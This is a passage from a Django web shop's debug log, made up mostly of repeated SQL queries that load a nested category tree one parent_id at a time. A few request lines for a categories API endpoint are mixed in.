args=(20,) DEBUG 2019-12-16 07:35:32,364 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) [16/Dec/2019 07:35:32] "GET /api/v1/categories/1 HTTP/1.0" 200 877 DEBUG 2019-12-16 07:35:32,367 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:35:32,369 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:35:32,371 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:35:32,374 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:35:32,377 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:35:32,379 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:35:32,381 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:35:32,383 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:35:32,387 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:35:32,389 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:35:32,392 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:35:32,394 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:35:32,397 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:35:32,400 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:35:32,405 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:35:32,408 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:35:32,410 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:35:32,413 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:35:32,415 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:35:32,419 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:35:32,421 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:35:32,424 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:35:32,426 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:35:32,429 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:35:32,436 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:35:32,439 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:35:32,441 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:35:32,444 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:35:32,446 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:35:32,448 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:35:32,451 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:35:32,454 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:35:32,456 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:35:32,459 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:35:32,461 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:35:32] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:35:50,405 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:35:50,411 utils 20136 140506432534272 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-16 07:35:50,416 utils 20136 140506422044416 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:35:50,419 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:35:50,422 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:35:50,425 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [16/Dec/2019 07:35:50] "GET /api/v1/categories/1 HTTP/1.0" 200 877 DEBUG 2019-12-16 07:35:50,429 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:35:50,431 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:35:50,433 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:35:50,435 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:35:50,438 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:35:50,441 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:35:50,443 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:35:50,445 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:35:50,448 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:35:50,450 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:35:50,453 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:35:50,456 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:35:50,458 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:35:50,460 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:35:50,462 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:35:50,466 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:35:50,468 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:35:50,472 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:35:50,475 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:35:50,479 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:35:50,482 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:35:50,486 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:35:50,488 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:35:50,492 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:35:50,494 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:35:50,497 utils 20136 140506422044416 (0.001) SELECT 